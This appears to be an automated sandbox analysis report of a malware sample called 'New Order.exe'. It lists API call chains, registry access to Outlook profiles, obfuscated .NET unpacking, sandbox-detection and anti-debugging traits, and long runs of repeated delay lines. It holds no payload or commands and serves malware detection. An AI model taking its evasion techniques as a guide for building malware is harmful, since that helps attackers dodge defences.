Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_003210BF AdjustTokenPrivileges,CloseHandle,		0_2_003210BF
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_003216C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_003216C3

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_003351CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_003351CD

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_0034A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0034A67C

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_0033648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0033648E

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_002C42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_002C42A2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\New Order.exe

File created: C:\Users\user\AppData\Local\Temp\autC751.tmp

Jump to behavior

Source: New Order.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\New Order.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\New Order.exe "C:\Users\user\Desktop\New Order.exe"
Source: C:\Users\user\Desktop\New Order.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\New Order.exe"
Source: C:\Users\user\Desktop\New Order.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\New Order.exe"	Jump to behavior

Source: C:\Users\user\Desktop\New Order.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: New Order.exe

Static file information: File size 1234944 > 1048576

Source: New Order.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: New Order.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: New Order.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: New Order.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: New Order.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: New Order.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: New Order.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: New Order.exe, 00000000.00000003.1261900706.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, New Order.exe, 00000000.00000003.1261008069.0000000003D70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: New Order.exe, 00000000.00000003.1261900706.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, New Order.exe, 00000000.00000003.1261008069.0000000003D70000.00000004.00001000.00020000.00000000.sdmp

Source: New Order.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: New Order.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: New Order.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: New Order.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: New Order.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_002C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_002C42DE

Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002E0A76 push ecx; ret	0_2_002E0A89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041C40C push cs; iretd	2_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00423149 push eax; ret	2_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041C50E push cs; iretd	2_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004231C8 push eax; ret	2_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040E21D push ecx; ret	2_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041C6BE push ebx; ret	2_2_0041C6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02A947B8 push eax; iretd	2_2_02A947B9

Source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IPYC102JgN0rV', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IPYC102JgN0rV', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IPYC102JgN0rV', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002DF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_002DF98E
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_00351C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00351C41

Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\New Order.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-96791

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\New Order.exe

API/Special instruction interceptor: Address: 14C3244

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_002CD010 rdtsc

0_2_002CD010

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

2_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598682	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596717	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596280	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594640	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8836			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1026			Jump to behavior

Source: C:\Users\user\Desktop\New Order.exe

API coverage: 3.8 %

Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_0032DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0032DBBE
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002FC2A2 FindFirstFileExW,	0_2_002FC2A2
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_003368EE FindFirstFileW,FindClose,	0_2_003368EE
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_0033698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0033698F
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_0032D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0032D076
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_0032D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0032D3A9
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_00339642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00339642
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_0033979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0033979D
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_00339B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00339B2B
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_00335C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00335C97

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_002C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_002C42DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598797	Jump to behavior
